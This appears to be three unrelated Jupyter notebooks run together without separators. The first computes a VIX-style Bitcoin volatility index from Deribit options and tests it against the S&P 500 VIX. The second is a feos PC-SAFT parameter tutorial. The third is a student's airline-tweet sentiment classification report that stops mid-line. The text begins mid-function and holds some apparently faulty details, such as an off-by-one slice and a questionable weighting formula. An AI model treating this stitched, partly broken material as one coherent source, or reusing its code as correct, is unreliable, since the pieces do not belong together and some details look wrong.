expired=expired)['result'] return [instrument['instrument_name'] for instrument in instrument_result if expiry in instrument['instrument_name']] except dbitApi.exceptions.ApiException as e: print(e) #logger.exception('Exception when calling MarketDataApi->public_get_instruments_get!') exit() def get_ticker(instrument): try: instrument_result = api.public_ticker_get(instrument)['result'] return instrument_result except dbitApi.exceptions.ApiException as e: print(e) #logger.exception('Exception when calling MarketDataApi->public_get_instruments_get!') exit() def get_bids_asks(near_list, next_list): near_calls = dict() near_puts = dict() next_calls = dict() next_puts = dict() for instrument in near_list: data = get_ticker(instrument) best_bid, best_ask = data['best_bid_price'], data['best_ask_price'] strike, cp = int(instrument.split('-')[2]), instrument.split('-')[3] if cp == 'C': near_calls[strike] = {'best_bid': best_bid, 'best_ask': best_ask} elif cp == 'P': near_puts[strike] = {'best_bid': best_bid, 'best_ask': best_ask} else: print(f'Error {instrument}') for instrument in next_list: data = get_ticker(instrument) best_bid, best_ask = data['best_bid_price'], data['best_ask_price'] strike, cp = int(instrument.split('-')[2]), instrument.split('-')[3] if cp == 'C': next_calls[strike] = {'best_bid': best_bid, 'best_ask': best_ask} elif cp == 'P': next_puts[strike] = {'best_bid': best_bid, 'best_ask': best_ask} else: print(f'Error {instrument}') near_calls_df = pd.DataFrame.from_dict(near_calls, orient='index').sort_index().replace(0, np.nan) near_puts_df = pd.DataFrame.from_dict(near_puts, orient='index').sort_index().replace(0, np.nan) next_calls_df = pd.DataFrame.from_dict(next_calls, orient='index').sort_index().replace(0, np.nan) next_puts_df = pd.DataFrame.from_dict(next_puts, orient='index').sort_index().replace(0, np.nan) return near_calls_df, near_puts_df, next_calls_df, next_puts_dfXVBT ImplementationReplication of CBOE VIX calculation.Near and next term expiries are defined as the next two Fridays respectively. Bid/ask data for all strike puts and calls are retrieved from Deribit for these expiries.api = dbitApi.MarketDataApi() now = datetime.now() near_expiry, next_expiry, near_datetime, next_datetime = get_near_next_terms(now) print(near_expiry, next_expiry) near_instruments = get_instruments_with_expiry(near_expiry) next_instruments = get_instruments_with_expiry(next_expiry) near_calls_df, near_puts_df, next_calls_df, next_puts_df = get_bids_asks(near_instruments, next_instruments) near_calls_dfStep 1: Select the options to be used in the VIX Index calculationCall and put prices are computed as the average of the respective bid and ask prices. The strike at which the call and put price difference is found to calculate forward prices and separation strikes.near_prices = pd.DataFrame(index=near_calls_df.index) near_prices['call_price'] = (near_calls_df['best_bid'] + near_calls_df['best_ask']) / 2 near_prices['put_price'] = (near_puts_df['best_bid'] + near_puts_df['best_ask']) / 2 near_prices['abs_diff'] = abs(near_prices['call_price'] - near_prices['put_price']) min_near_strike = near_prices['abs_diff'].idxmin() min_near_diff = near_prices.loc[min_near_strike].abs_diff next_prices = pd.DataFrame(index=next_calls_df.index) next_prices['call_price'] = (next_calls_df['best_bid'] + next_calls_df['best_ask']) / 2 next_prices['put_price'] = (next_puts_df['best_bid'] + next_puts_df['best_ask']) / 2 next_prices['abs_diff'] = abs(next_prices['call_price'] - next_prices['put_price']) min_next_strike = next_prices['abs_diff'].idxmin() min_next_diff = next_prices.loc[min_next_strike].abs_diff near_pricesThe XVBT index is set to have a constant maturity of seven days and a yield rate of zero (which should not make a difference to calculations - refer to Alexander paper page 9). This is used to calculate forward prices f1, f2 and separation strikes k0_1, k0_2.const_mature_days = 7 R = 0 n1 = (near_datetime - now).total_seconds() / 60 n2 = (next_datetime - now).total_seconds() / 60 nY = 525600 n = const_mature_days * 24 * 60 t1 = n1/nY t2 = n2/nY # Compute forward prices and at-the-money strikes f1 = min_near_strike + np.e**(R*t1) * min_near_diff k0_1 = max([strike for strike in near_prices.index if strike <= min_near_strike]) f2 = min_next_strike + np.e**(R*t2) * min_next_diff k0_2 = max([strike for strike in next_prices.index if strike <= min_next_strike]) print(k0_1, f1, k0_2, f2)7750 7750.00225 7750 7750.003Out of the money calls and puts are found by using the calculated separation strikes and excluding at the money strikes.near_otm_puts_df = near_puts_df.loc[:k0_1][:-1] near_otm_calls_df = near_calls_df.loc[k0_1:][1:] next_otm_puts_df = next_puts_df.loc[:k0_2][:-1] next_otm_calls_df = next_calls_df.loc[k0_2:][1:] near_otm_puts_df near_otm_calls_dfStrikes following two consecutive bid prices and strikes with zero bids are excluded.near_otm_puts_df = near_otm_puts_df.sort_index(ascending=False) near_otm_puts_df = near_otm_puts_df.assign(zero_bid=lambda df: (df['best_bid'] == 0).astype(int)) near_otm_puts_df['zero_bid_cumsum'] = near_otm_puts_df['zero_bid'].cumsum() near_otm_puts_df = near_otm_puts_df[(near_otm_puts_df['zero_bid_cumsum'] <= 2) & (near_otm_puts_df['best_bid'] > 0)] near_otm_puts_df near_otm_calls_df = near_otm_calls_df.assign(zero_bid=lambda df: (df['best_bid'] == 0).astype(int)) near_otm_calls_df['zero_bid_cumsum'] = near_otm_calls_df['zero_bid'].cumsum() near_otm_calls_df = near_otm_calls_df[(near_otm_calls_df['zero_bid_cumsum'] <= 2) & (near_otm_calls_df['best_bid'] > 0)] near_otm_calls_df next_otm_puts_df = next_otm_puts_df.sort_index(ascending=False) next_otm_puts_df = next_otm_puts_df.assign(zero_bid=lambda df: (df['best_bid'] == 0).astype(int)) next_otm_puts_df['zero_bid_cumsum'] = next_otm_puts_df['zero_bid'].cumsum() next_otm_puts_df = next_otm_puts_df[(next_otm_puts_df['zero_bid_cumsum'] <= 2) & (next_otm_puts_df['best_bid'] > 0)] next_otm_calls_df = next_otm_calls_df.assign(zero_bid=lambda df: (df['best_bid'] == 0).astype(int)) next_otm_calls_df['zero_bid_cumsum'] = next_otm_calls_df['zero_bid'].cumsum() next_otm_calls_df = next_otm_calls_df[(next_otm_calls_df['zero_bid_cumsum'] <= 2) & (next_otm_calls_df['best_bid'] > 0)] next_otm_puts_df next_otm_calls_dfStep 2: Calculate volatility for both near-term and next-term optionsRefer to VIX white paper page 8.near_calc_strikes_df = pd.DataFrame(index=near_prices.index) near_calc_strikes_df['price'] = (near_otm_puts_df['best_bid'] + near_otm_puts_df['best_ask']) / 2 near_calc_strikes_df['price'] = near_calc_strikes_df.price.combine_first((near_otm_calls_df['best_bid'] + near_otm_calls_df['best_ask']) / 2) near_calc_strikes_df.at[k0_1] = (near_prices.loc[k0_1].call_price + near_prices.loc[k0_1].put_price) / 2 near_calc_strikes_df = near_calc_strikes_df.dropna() near_calc_strikes_df next_calc_strikes_df = pd.DataFrame(index=next_prices.index) next_calc_strikes_df['price'] = (next_otm_puts_df['best_bid'] + next_otm_puts_df['best_ask']) / 2 next_calc_strikes_df['price'] = next_calc_strikes_df.price.combine_first((next_otm_calls_df['best_bid'] + next_otm_calls_df['best_ask']) / 2) next_calc_strikes_df.at[k0_2] = (next_prices.loc[k0_2].call_price + next_prices.loc[k0_2].put_price) / 2 next_calc_strikes_df = next_calc_strikes_df.dropna() next_calc_strikes_df near_sum = 0 for i in range(len(near_calc_strikes_df)): row = near_calc_strikes_df.iloc[i] if i == 0: deltaKi = near_calc_strikes_df.iloc[i+1].name - row.name elif i == len(near_calc_strikes_df) - 1: deltaKi = row.name - near_calc_strikes_df.iloc[i-1].name else: deltaKi = (near_calc_strikes_df.iloc[i+1].name - near_calc_strikes_df.iloc[i-1].name) / 2 near_sum += deltaKi/(row.name ** 2) * np.e**(R*t1) * row.price next_sum = 0 for i in range(len(next_calc_strikes_df)): row = next_calc_strikes_df.iloc[i] if i == 0: deltaKi = next_calc_strikes_df.iloc[i+1].name - row.name elif i == len(next_calc_strikes_df) - 1: deltaKi = row.name - next_calc_strikes_df.iloc[i-1].name else: deltaKi = (next_calc_strikes_df.iloc[i+1].name - next_calc_strikes_df.iloc[i-1].name) / 2 next_sum += deltaKi/(row.name ** 2) * np.e**(R*t2) * row.price sigma1 = ((2/t1) * near_sum) - (1/t1)*((f1/k0_1 - 1)**2) sigma2 = ((2/t2) * next_sum) - (1/t2)*((f2/k0_2 - 1)**2) print(sigma1, sigma2) VXBT = 100 * np.sqrt(((t1*sigma1)*((n2-n)/(n2-n1)) + (t2*sigma2)*((n-n1)/(n2-n1)))*(nY/n)) VXBTAVXBT and GVXBT ImplementationRefer to *'The Crypto Investor Fear Gauge and the Bitcoin Variance Risk Premium'* by and .omega = ((n2-nY)/(n2-n1))*n GVXBT = np.sqrt(omega*t1*sigma1 + (1-omega)*t2*sigma2) GVXBT sigma1_a = sigma1 * (f1**-2) sigma2_a = sigma2 * (f2**-2) AVXBT = np.sqrt(omega*t1*sigma1_a + (1-omega)*t2*sigma2_a) AVXBT*** Test implementation against CBOE VIX for S&P 500 optionsfrom vxbt_calc import vxbt_calc as vc from datetime import timedeltaCBOE's VIX takes options expiring between 23 and 37 days from now as near-term and next-term options (see CBOE VIX White Paper). Assume exact time of expiry can be neglected for now.now = datetime.now().date() start_date = now + timedelta(days=23) end_date = now + timedelta(days=37) fridays = [day for row in calendar.Calendar(firstweekday=calendar.MONDAY).yeardatescalendar(now.year) for month in row for week in month for day in week if day.weekday() == calendar.FRIDAY] near_exp, next_exp = [friday for friday in fridays if friday > start_date and friday < end_date] near_exp, next_expManually download data CSVs from https://www.barchart.com/stocks/quotes/$SPX/options to processnear_data = pd.read_csv('$spx-options-exp-2020-05-22-show-all-stacked-04-27-2020.csv', skipfooter=1) next_data = pd.read_csv('$spx-options-exp-2020-05-29-show-all-stacked-04-27-2020.csv', skipfooter=1) near_data near_calls_df = near_data[near_data['Type'] == 'Call'][['Strike', 'Bid', 'Ask']].replace(',', '', regex=True).astype('float').replace(0, np.nan).set_index('Strike').sort_index().rename({'Bid': 'best_bid', 'Ask': 'best_ask'}, axis=1) near_puts_df = near_data[near_data['Type'] == 'Put'][['Strike', 'Bid', 'Ask']].replace(',', '', regex=True).astype('float').replace(0, np.nan).set_index('Strike').sort_index().rename({'Bid': 'best_bid', 'Ask': 'best_ask'}, axis=1) next_calls_df = next_data[next_data['Type'] == 'Call'][['Strike', 'Bid', 'Ask']].replace(',', '', regex=True).astype('float').replace(0, np.nan).set_index('Strike').sort_index().rename({'Bid': 'best_bid', 'Ask': 'best_ask'}, axis=1) next_puts_df = next_data[next_data['Type'] == 'Put'][['Strike', 'Bid', 'Ask']].replace(',', '', regex=True).astype('float').replace(0, np.nan).set_index('Strike').sort_index().rename({'Bid': 'best_bid', 'Ask': 'best_ask'}, axis=1) near_calls_dfSet maturity to 30 days as specified in VIX White Paper and arbitrarily use value of R1 from the paper as the yield rate (effect is negligible).maturity = 30 rate = 0.000305 VIX, _1, _2 = vc.calculate_indices(now, near_exp, next_exp, maturity, rate, near_calls_df, near_puts_df, next_calls_df, next_puts_df) VIXGet the value of VIX from Yahoo Finance at the time options data was downloaded:import yfinance as yf yf_vix = yf.Ticker('^VIX') yf_vix.history(period='5d').at['2020-04-27', 'Close']Value matches. Not an exact match but this is expected as US Treasury yield rates and exact expiry times are neglected in our calculation.sp = yf.Ticker('^SPX') sp.option_chain('2020-04-29').callsModule Name Introduction to the Module Main Concept Tutorial About the Datasets Libraries used and references Learning Objectives Checklist Resources Contact for HelpWorking with parameters Goal- Read in parameters for pure substances and mixtures from json files, and- create parameters for pure substances and mixtures within Python.- For both regular parameters as well as via the homo-segmented group contribution method.- Learn how to access information stored in parameter objects. Parameters and the equation of stateBefore we can start to compute physical properties, two steps are needed:1. Build a parameter object.2. Instatiate the equation of state using the parameter object.In principle, every implementation of an equation of state can manage parameters differently but typically the workflow is similar for each implementation.For `pcsaft` we first generate the parameters object, `PcSaftParameters`, which we then use to generate the equation of state object, `PcSaft`.The `PcSaftParameters` object is part of the `feos.pcsaft` module while `PcSaft` is part of the `feos.pcsaft.eos` module.from feos.pcsaft import PcSaftParameters--- Read parameters from json file(s)The easiest way to create the `PcSaftParameters` object is to read information from one or more json files.- To read information from a single file, use `PcSaftParameters.from_json`- To read information from multiple files, use `PcSaftParameters.from_multiple_json` From a single file Pure substanceQuerying a substance from a file requires an *identifier*.This identifier can be one of `Name`, `Cas`, `Inchi`, `IupacName`, `Formula`, or `Smiles` with `Name` (common english name) being the default.We can change the identifier type usig the `search_option` argument. Given a list of identifiers and a path to the parameter file, we can conveniently generate our object.# path to parameter file for substances that are non-associating, i.e. defined by three parameters: m, sigma, and epsilon_k. file_na = '../parameters/pcsaft/gross2001.json' # a system containing a single substance, "methane", using "Name" as identifier (default) parameters = PcSaftParameters.from_json(['methane'], pure_path=file_na) parameters # a system containing a single substance, "methane", using "Smiles" ("C") as identifier parameters = PcSaftParameters.from_json(['C'], pure_path=file_na, search_option="Smiles") parametersMixturesReading parameters for more than one substance from a single file is very straight forward: simply add more identifiers to the list.Note that the **order** in which which identifiers are provided **is important**. When computing vector valued properties, **the order of the physical properties matches the order of the substances within the parameter object**.# a system containing a ternary mixture parameters = PcSaftParameters.from_json(['methane', 'hexane', 'dodecane'], pure_path=file_na) parametersFrom multiple filesThere may be cases where we have to split our parameter information across different files. For example, the `feos` repository has parameters stored in different files where each file corresponds to the parameter's original publication. Constructing the parameter object using multiple different json files is a bit more complicated. We can provide a list tuples, each of which contains the list of substances and the file where parameters are stored.In the example below, we define a 4 component mixture from three input files:- methane is read from a file containing non-associating substance parameters.- parameters for 1-butanol and water are read from a file containing associating substances, and- acetone parameters are read from a file that contains substances modelled with dipolar interactions.# na = non-associating # assoc = associating file_na = '../parameters/pcsaft/gross2001.json' file_assoc = '../parameters/pcsaft/gross2002.json' file_dipolar = '../parameters/pcsaft/gross2006.json' parameters = PcSaftParameters.from_multiple_json( [ (['C'], file_na), (['CCCCO', 'O'], file_assoc), (['CC(C)=O'], file_dipolar) ], search_option='Smiles' ) parametersWith binary interaction parametersSome mixtures cannot be adequately described with combination rules from pure substance parameters.In PC-SAFT, we can use a binary interaction parameter, `k_ij`, to enhance the description of mixture behavior.These interaction parameters can be supplied from a json file via the `binary_path` option.This parameter is not shown in the default representation of the parameter object. You can access the matrix of `k_ij` via the getter, `PcSaftParameters.k_ij`.file_na = '../parameters/pcsaft/gross2001.json' file_assoc = '../parameters/pcsaft/gross2002.json' file_binary = '../parameters/pcsaft/gross2002_binary.json' parameters = PcSaftParameters.from_multiple_json( [ (['CCCC'], file_na), (['CCCCO',], file_assoc) ], binary_path=file_binary, search_option='Smiles' ) parameters parameters.k_ij--- Building parameters in PythonBuilding `PcSaftParameters` in Python is a bit more involved since the `PcSaftParameters` object is built from multiple intermediate objects.Let's import these objects, i.e.- the `Identifier` object that stores information about how a substance can be identified,- the `PcSaftRecord` object that stores our SAFT parameters,- and the `PureRecord` object that bundles identifier and parameters together with the molar weight.All these objects are imported from the `feos.pcsaft` module.from feos.pcsaft import Identifier, PcSaftRecord, PureRecordFor the `Identifier`, only `cas` is mandatory. If you quickly want to build a system, this value does not have to be sensible (i.e. you could simply use `'1'`).identifier = Identifier( cas='106-97-8', name='butane', iupac_name='butane', smiles='CCCC', inchi='InChI=1/C4H10/c1-3-4-2/h3-4H2,1-2H3', formula='C4H10' ) identifierThe `PcSaftRecord` contains the model parameters for a pure substance. *Mandatory* parameters are- the number of segments, `m`, which is a dimensionless floating point number,- the Lennard-Jones structure parameter (diameter), `sigma`, in units of Angstrom, and- the Lennard-Jones energy parameter, `epsilon_k`, in units of Kelvin.*Optional* parameters are- the dipole moment, `mu`, in units of Debye used to model dipolar substances,- the quadrupole moment, `q`, in units of Debye used to model quadrupolar substances,- parameters to model association: - `kappa_ab`, `epsilon_k_ab`, `na`, `nb`- and parameters for entropy scaling: - `viscosity`, `diffusion`, and `thermal_conductivity` - each of which is a list containing coefficients for the respective correlation functions.# parameters for a non-associating, non-polar substance (butane) psr = PcSaftRecord(m=2.3316, sigma=3.7086, epsilon_k=222.88) psrA `PureRecord` is built from an `Identifier`, the molar weight (in gram per mole) and a `PcSaftRecord`. Optionally, but not shown in this example, we can provide an `ideal_gas_record` depending on the ideal gas model used in the equation of state. We will not discuss this contribution here but address the topic in a different example.butane = PureRecord(identifier, molarweight=58.123, model_record=psr) butane`PcSaftParameters` for a single component For a single substance, we can use the `PcSaftParameters.new_pure` constructor.parameters = PcSaftParameters.new_pure(butane) parameters`PcSaftParameters` for binary mixturesWe can create another `PureRecord` for a second component. Then, the `PcSaftParameters.new_binary` constructor let's us build the parameters. Optionally, we can also directly provide a `k_ij` value for this system.butan_1_ol = PureRecord( identifier=Identifier( cas='71-36-3', name='1-butanol', iupac_name='butan-1-ol', smiles='CCCCO', inchi='InChI=1/C4H10O/c1-2-3-4-5/h5H,2-4H2,1H3', formula='C4H10O' ), molarweight=74.123, model_record=PcSaftRecord(m=2.7515, sigma=3.6139, epsilon_k=259.59, kappa_ab=0.006692, epsilon_k_ab=2544.6) ) parameters = PcSaftParameters.new_binary([butane, butan_1_ol], binary_record=0.015) parameters parameters.k_ij`PcSaftParameters` for mixtures with more than two componentsFor mixtures with more than two components, we can use the `PcSaftParameters.from_records` constructor which takes a list of `PureRecords` and a `numpy.ndarray` containing the matrix of `k_ij` values.import numpy as np k_ij = np.zeros((2, 2)) k_ij[0, 1] = k_ij[1, 0] = 0.015 parameters = PcSaftParameters.from_records([butane, butan_1_ol], binary_records=k_ij) parameters parameters.k_ij--- Parameters from homo-segmented group contribution (homo-GC)An alternative to substance specific parameters are parameters that combine information from functional groups (molecule *segments*).A simple variant that only uses the *number of segments* (*not* how these segments are connected to form the molecule) is the so-called homo-segmented group contribution method (homo-GC).As with regular SAFT parameters, we can build a `PcSaftParameters` object from json or from Python - using segment information. From json filesWe need at least two files: - `pure_path`: a file containing the substance identifiers *and* the segments that form the molecule- `segments_path`: a file that contains the segments (identifier and model parameters)As before, we can specify our substance identifier using `search_option` and we can provide binary interaction parameters (segment-segment `k_ij`) via the `binary_path` argument.pure_path = '../parameters/pcsaft/gc_substances.json' segments_path = '../parameters/pcsaft/sauer2014_homo.json' parameters = PcSaftParameters.from_json_segments(['CCCC', 'CCCCO'], pure_path, segments_path, search_option='Smiles') parametersFrom PythonBuilding parameters in Python follows a similar approach as for regular parameters. To build `PcSaftParameters` from segments, we need to specify:- The `ChemicalRecord` which contains the `Identifier` and the segments (as list of `str`s),- and the `SegmentRecord` which specifies the identifier of the segment (has to be the same as in the list of the `ChemicalRecord`), the molar weight and the `PcSaftRecord` for the segment.If both are available, we can use the `PcSaftParameters.from_segments` constructor to build the parameters.from feos.pcsaft import ChemicalRecord, SegmentRecord cr1 = ChemicalRecord( identifier=Identifier( cas='106-97-8', name='butane', iupac_name='butane', smiles='CCCC', inchi='InChI=1/C4H10/c1-3-4-2/h3-4H2,1-2H3', formula='C4H10' ), segments=['CH3', 'CH2', 'CH2', 'CH3'] ) cr2 = ChemicalRecord( identifier=Identifier( cas='71-36-3', name='1-butanol', iupac_name='butan-1-ol', smiles='CCCCO', inchi='InChI=1/C4H10O/c1-2-3-4-5/h5H,2-4H2,1H3', formula='C4H10O' ), segments=['CH3', 'CH2', 'CH2', 'CH2', 'OH'] )Each segment has a `PcSaftRecord` which can be constructed just like we did before for a substance.ch3 = SegmentRecord('CH3', molarweight=15.0345, model_record=PcSaftRecord(m=0.61198, sigma=3.7202, epsilon_k=229.90)) ch2 = SegmentRecord('CH2', molarweight=14.02658, model_record=PcSaftRecord(m=0.45606, sigma=3.8900, epsilon_k=239.01)) oh = SegmentRecord('OH', molarweight=17.00734, model_record=PcSaftRecord(m=0.40200, sigma=3.2859, epsilon_k=488.66, epsilon_k_ab=2517.0, kappa_ab=0.006825)) parameters = PcSaftParameters.from_segments(chemical_records=[cr1, cr2], segment_records=[ch3, ch2, oh]) parametersAccessing information from parameter objectsOnce the `PcSaftParameter` object is constructed, within a jupyter notebook, we get a nice representation in form of a markdown table.Sometimes, however you might want to access information not presented in this table or you might want to store information in a variable.Let's build parameters for the four-component mixture we looked at earlier:file_na = '../parameters/pcsaft/gross2001.json' file_assoc = '../parameters/pcsaft/gross2002.json' file_dipolar = '../parameters/pcsaft/gross2006.json' parameters = PcSaftParameters.from_multiple_json( [ (['C'], file_na), (['CCCCO', 'O'], file_assoc), (['CC(C)=O'], file_dipolar) ], search_option='Smiles' ) parametersAs we've seen before, we can directly access the binary interaction parameter, `k_ij`, which is zero here for all binary interactions (we did not provide a file).parameters.k_ijGet `PureRecord`s via `parameters.pure_records`We have seen above that it is possible to generate parameters in Python using intermediate objects, such as `Identifier`, `PcSaftRecord` and `PureRecord`.You can generate these objects for all substances via the `pure_records` method (getter).This getter returns `PureRecord` objects which can be further deconstructed to yield the `Identifier` and `PcSaftRecord` objects and the molar weight.Note that the order in which substances are returned matches the order in which we specified the substances above.parameters.pure_records for pure_record in parameters.pure_records: print(f"σ ({pure_record.identifier.name})\t = {pure_record.model_record.sigma} A") # get identifier of substance 0 parameters.pure_records[0].identifier # get molarweight of substance 0 parameters.pure_records[0].molarweightA `PureRecord` object can be used to generate a json string which then can conveniently be stored in a file.# generate a json string from identifier of substance 0 parameters.pure_records[0].to_json_str()CIS434 Social MediaFinal Project ReportFangyuan (Milar) Liu31637503 IntroductionThe dataset provided for this project is the tweets sent by a customer to an airline, extracted from twitter. Most of the tweets are negative. The goal of this project is to identify those tweets that are NOT negative. In order to achieve the goal, the following steps are conducted, including .Throughout all the steps, the output will be generated as:* a CSV file of non-negative tweets consisting of three columns:* * column 1: id from the original table corresponding to the tweet* * column 2: the evaluation of whether the classification is correct (1 being correct, 0 being wrong)* * column 3: contents of the identified non-negative tweets 1. Data cleaning and visualization 1.1 Import the packages for further steps# packages for data handling import re import pandas as pd import numpy as np # packages for visualization import matplotlib.pyplot as plt %matplotlib inline import seaborn as sns # packages for pre-processing and text handling import string import nltk from nltk.stem.porter import * from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.model_selection import train_test_split from sklearn.model_selection import GridSearchCV from sklearn.metrics import f1_score # packages for model building from sklearn.naive_bayes import MultinomialNB from sklearn.svm import SVC from sklearn.ensemble import BaggingClassifier from sklearn import tree from sklearn.tree import DecisionTreeClassifier from sklearn.linear_model import LogisticRegression from sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier # packages for ignoring unnecessary warnings import warnings warnings.simplefilter(action='ignore', category=FutureWarning) warnings.filterwarnings(action='ignore', category=DeprecationWarning) pd.set_option('mode.chained_assignment', None)1.2 Load the training and testing datasetLoad the training dataset and label the noncomplaint tweets as 1, and the complaint ones as 0, combine them together. Also load the test dataset and label the tweets as NaN for further processing. There are 1700 obs of non-negative training data and 1700 obs of negative training data. The testing data includes 4555 unlabeled obs.train_pos = pd.read_csv('noncomplaint1700.csv') train_pos['label'] = 1 train_neg = pd.read_csv('complaint1700.csv') train_neg['label'] = 0 train = pd.concat([train_pos, train_neg]) test = pd.read_csv('temp.csv')[['id', 'airline', 'tweet']] test['label'] = np.nan1.3 Clean the datasetsFirstly, combine the training and testing dataset for pre-processing together. Then, define the function remove_pattern( ) to remove the "@user", which is unnecessary for the analysis. Also, remove the numbers and special characters, which are also unnecessary. Secondly, tokenize all the tweets in the combined dataset. Thridly, stemming the tweets context. For instance, the words "playing, player, played" will all be regarded as the root word "play".combi = train.append(test, ignore_index=True) def remove_pattern(input_txt, pattern): r = re.findall(pattern, input_txt) for i in r: input_txt = re.sub(i, '', input_txt) return input_txt combi['tidy_tweet'] = np.vectorize(remove_pattern)(combi['tweet'], "@[\w]*") combi['tidy_tweet'] = combi['tidy_tweet'].str.replace("[^a-zA-Z#]", " ") tokenized_tweet = combi['tidy_tweet'].apply(lambda x: x.split()) tokenized_tweet.head() stemmer = PorterStemmer() tokenized_tweet = tokenized_tweet.apply(lambda x: [stemmer.stem(i) for i in x]) # stemming tokenized_tweet.head() for i in range(len(tokenized_tweet)): tokenized_tweet[i] = ' '.join(tokenized_tweet[i]) combi['tidy_tweet'] = tokenized_tweet1.4 Learn about the keywordsUse wordcloud to plot the frequently used words, to learn about the tweets content. As we can see, the keywords include: flight, plane, delay, airline, time, cancel, customerservice, etc. The wordcloud gives a general idea of users' sentiments distribution in the datasets.all_words = ' '.join([text for text in combi['tidy_tweet']]) from wordcloud import WordCloud wordcloud = WordCloud(width=800, height=500, random_state=21, max_font_size=110).generate(all_words) plt.figure(figsize=(10, 7)) plt.imshow(wordcloud, interpolation="bilinear") plt.axis('off') plt.show()2. Feature extraction 2.1 Use bag-of-word (bow) for featuring# bag-of-word from sklearn.feature_extraction.text import CountVectorizer bow_vectorizer = CountVectorizer(max_df=0.90, min_df=2, max_features=1000, stop_words='english') bow = bow_vectorizer.fit_transform(combi['tidy_tweet'])2.2 Use TF-IDF for featuring# tfidf tfidf_vectorizer = TfidfVectorizer(max_df=0.90, min_df=2, max_features=1000, stop_words='english') tfidf = tfidf_vectorizer.fit_transform(combi['tidy_tweet'])2.3 Split the featured data into training and testing datasetsAs mentioned, there are 3400 obs in the training dataset (1700 non-negative obs and 1700 negative obs), and 4555 obs in testing dataset. In addition, build a dataframe called "res" to store the results of models.train_bow = bow[:3400,:] test_bow = bow[3401:,:] X_train=tfidf[0:3400,:] y_train=combi['label'].loc[0:3399] X_test=tfidf[3400:,:] res = combi.loc[3400:,] res3. Model buildingTo classify the testing tweets into non-negative ones and negative ones, build 6 different models, which are:* Naive Bayes (NB)* Support vector machine (SVM)* * polynomial kernel* * rbf kernel* Bagging* Boosting* Logistic regression* Random forestSpecifically, for the models need to decide parameters (SVM, LR, RF), use GridSearchCV to find the best parameters and best estimators for the model. Since it can be quite arbitrary to directly classify the obs as non-negative (1) and negative (0), it's better to check the probability that each prediction being 1 or 0, learn about the probabilities, and then, set appropriate threshold to tune the predictions accordingly.For each model, a list is created to store the predictions generated by this model. 3.1 Naive Bayes (NB)Having used .predict_proba( ) to check the prabablity of classification, the output shows that most of the probabilities centralize around 0.33. Hence, it should be better to set the threshold to 0.33 rather than the default value 0.5. By setting the threshold as 0.33, if the probability to label 0 is greater than 0.33, the obs will be classified as negative, otherwise it will be classified as non-negative.NB = MultinomialNB().fit(X_train, y_train) NB_neg = NB.predict_proba(X_test)[:,0] NB_pred = [] for i in range(0, len(NB_neg)): if NB_neg[i] > 0.33: NB_pred.append(0) else: NB_pred.append(1) res['NB_pred'] = NB_pred3.2 Support vector machine (SVM)For SVM models using polynomial and rbf kernel, use GridSearchCV to find out the best parameters and best estimators. As same logic mentioned above, the threshold of SVM model is set as 0.4 to make the classification more effective.# kernel=poly SVM_poly = SVC(kernel='poly', probability=True) param_grid = {'C': [0.1,1,10,100], 'gamma': [0.01,0.1,1],'degree': [2,3,5]} grid_search = GridSearchCV(SVM_poly, param_grid, cv=5) grid_search.fit(X_train, y_train) print(grid_search.best_params_) print(grid_search.best_estimator_) SVM_poly_neg = grid_search.predict_proba(X_test)[:,0] SVM_poly_pred = [] for i in range(0, len(SVM_poly_neg)): if SVM_poly_neg[i] > 0.4: SVM_poly_pred.append(0) else: SVM_poly_pred.append(1) res['SVM(poly) pred'] = SVM_poly_pred # kernel-rbf SVM_rbf = SVC(kernel='rbf', probability=True) param_grid = {'C': [0.1,1,10,100], 'gamma': [0.01,0.1,1],'degree': [2,3,5]} grid_search = GridSearchCV(SVM_rbf, param_grid, cv=5) grid_search.fit(X_train, y_train) print(grid_search.best_params_) print(grid_search.best_estimator_) SVM_rbf_neg = grid_search.predict_proba(X_test)[:,0] SVM_rbf_pred = [] for i in range(0, len(SVM_rbf_neg)): if SVM_rbf_neg[i] > 0.4: SVM_rbf_pred.append(0) else: SVM_rbf_pred.append(1) res['SVM(rbf) pred'] = SVM_rbf_pred3.3 BaggingFor bagging model, as same logic mentioned above, the threshold of bagging model is set as 0.4 to make the classification more effective.dtc = DecisionTreeClassifier(criterion="entropy") bagging = BaggingClassifier(base_estimator=dtc, n_estimators=100, bootstrap=True) bagging = bagging.fit(X_train,y_train) bagging_neg = bagging.predict_proba(X_test)[:,0] bagging_pred = [] for i in range(0, len(bagging_neg)): if bagging_neg[i] > 0.4: bagging_pred.append(0) else: bagging_pred.append(1) res['Bagging pred'] = bagging_pred3.4 BoostingFor boosting model, as same logic mentioned above, the threshold of boosting model is set as 0.495 to make the classification more effective.boosting = AdaBoostClassifier(n_estimators=100, learning_rate=1) boosting = boosting.fit(X_train, y_train) boosting_neg = boosting.predict_proba(X_test)[:,0] boosting_pred = [] for i in range(0, len(boosting_neg)): if boosting_neg[i] > 0.495: boosting_pred.append(0) else: boosting_pred.append(1) res['Boosting pred'] = boosting_pred3.5 Logistic regression (LR)For LR model, use GridSearchCV to find out the best parameters and best estimators. As same logic mentioned above, the threshold of LR model is set as 0.4 to make the classification more effective.LR = LogisticRegression(random_state=1) param_grid = {"C":np.logspace(-3,3,7), "penalty":["l1","l2"]} grid_search = GridSearchCV(LR, param_grid,cv=5) grid_search.fit(X_train,y_train) print(grid_search.best_params_) print(grid_search.best_estimator_) LR_neg = grid_search.predict_proba(X_test)[:,0] LR_pred = [] for i in range(0, len(LR_neg)): if LR_neg[i] > 0.4: LR_pred.append(0) else: LR_pred.append(1) res['LR pred'] = LR_pred3.6 Random forest (RF)For RF model, use GridSearchCV to find out the best parameters and best estimators. As same logic mentioned above, the threshold of RF model is set as 0.41 to make the classification more effective.RF = RandomForestClassifier() param_grid = {'n_estimators': [50,100,500,1000], 'max_features': [5,15,25],'max_depth':[5,10,20,50]} grid_search = GridSearchCV(RF, param_grid,cv=5) grid_search.fit(X_train,y_train) print(grid_search.best_params_) print(grid_search.best_estimator_) RF_neg = grid_search.predict_proba(X_test)[:,0] RF_pred = [] for i in range(0, len(RF_neg)): if RF_neg[i] > 0.411: RF_pred.append(0) else: RF_pred.append(1) res['RF pred'] = RF_pred4. Model results and selectionTo display the results of the above models, create a dataframe with the first column showing the names of models, the second column showing the predicted number of non-negative tweets.models_res = pd.DataFrame() models_res['Model name'] = ['NB', 'SVM(poly)', 'SVM(rbf)', 'Bagging', 'Boosting', 'LR', 'RF'] models_res['# of non-negative tweets'] = [sum(NB_pred), sum(SVM_poly_pred), 